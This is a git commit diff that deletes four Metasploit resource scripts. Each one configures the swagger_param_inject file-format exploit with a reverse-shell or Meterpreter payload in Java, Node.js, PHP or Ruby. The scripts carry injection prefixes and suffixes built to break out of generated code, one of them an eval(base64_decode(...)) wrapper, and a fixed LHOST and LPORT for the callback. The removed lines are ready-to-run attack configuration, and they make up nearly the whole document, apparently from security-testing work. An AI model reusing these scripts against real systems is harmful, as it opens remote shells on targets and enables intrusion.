Remove the RC files
parent
08d08d2c95
commit
92522138c5
|
@ -1,11 +0,0 @@
|
|||
set PAYLOAD java/jsp_shell_reverse_tcp
|
||||
|
||||
use exploit/multi/fileformat/swagger_param_inject
|
||||
|
||||
set PAYLOAD_LOC "PATH"
|
||||
set PAYLOAD_PREFIX "a\\\"; "
|
||||
|
||||
set LHOST 192.168.68.138
|
||||
set LPORT 4444
|
||||
|
||||
run
|
|
@ -1,13 +0,0 @@
|
|||
set PAYLOAD nodejs/shell_reverse_tcp
|
||||
|
||||
use exploit/multi/fileformat/swagger_param_inject
|
||||
|
||||
set INFO_VERSION "1.0.0"
|
||||
set PAYLOAD_LOC "PATH"
|
||||
set PAYLOAD_PREFIX "/a');};};return exports;}));"
|
||||
set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('"
|
||||
|
||||
set LHOST 192.168.68.138
|
||||
set LPORT 4444
|
||||
|
||||
run
|
|
@ -1,11 +0,0 @@
|
|||
set PAYLOAD php/meterpreter/reverse_tcp
|
||||
|
||||
use exploit/multi/fileformat/swagger_param_inject
|
||||
|
||||
set PAYLOAD_PREFIX "*/ namespace foobar; eval(base64_decode('"
|
||||
set PAYLOAD_SUFFIX "')); /*"
|
||||
|
||||
set LHOST 192.168.68.138
|
||||
set LPORT 4444
|
||||
|
||||
run
|
|
@ -1,12 +0,0 @@
|
|||
set PAYLOAD ruby/shell_reverse_tcp
|
||||
|
||||
use exploit/multi/fileformat/swagger_param_inject
|
||||
|
||||
set PAYLOAD_LOC "INFO_TITLE"
|
||||
set PAYLOAD_PREFIX "=end "
|
||||
set INFO_DESCRIPTION "=begin "
|
||||
|
||||
set LHOST 192.168.68.138
|
||||
set LPORT 4444
|
||||
|
||||
run
|
Loading…
Reference in New Issue